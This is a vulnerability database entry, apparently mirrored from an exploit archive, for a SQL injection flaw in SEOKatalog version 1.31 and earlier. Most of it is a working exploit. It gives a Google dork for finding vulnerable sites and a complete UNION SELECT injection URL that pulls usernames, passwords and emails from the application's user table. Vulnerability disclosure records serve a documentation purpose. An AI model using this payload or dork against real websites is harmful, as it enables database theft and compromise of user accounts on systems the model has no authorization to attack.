SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability

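Vulnerability ID 1047393 Vulnerability type
Published 2012-06-04 Updated 2012-06-04
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2012060022
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit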
#################
#         SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability        #
#################
# Exploit Title: SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability #
#       Version: <= 1.31                                                    #
#        Vendor: http://www.seokatalogi.pl/                                 #
#      Category: webapps                                                    #
#          Date: 08.09.2011                                                 #
#        Author: Smugller                                                   #
#       Contact: smugll3r[alt+64]gmail.com                                  #
#         Group: DevilTeam                                                  #
#       Website: http://devilteam.pl                                        #
#          From: Poland                                                     #
#   Google Dork: intext:"Powered by SEOKatalog 1.31"                        #
#################

# Exploit:
http://site.com/index.php?action=site_cat&cat=&id_site=&id=-1+union+all+select+1,2,3,4,5,6,7,8,9,group_concat(0x3c62722f3e,nick,0x3a,pass,0x3a,email,0x3c62722f3e),11,12+from+seokat_users--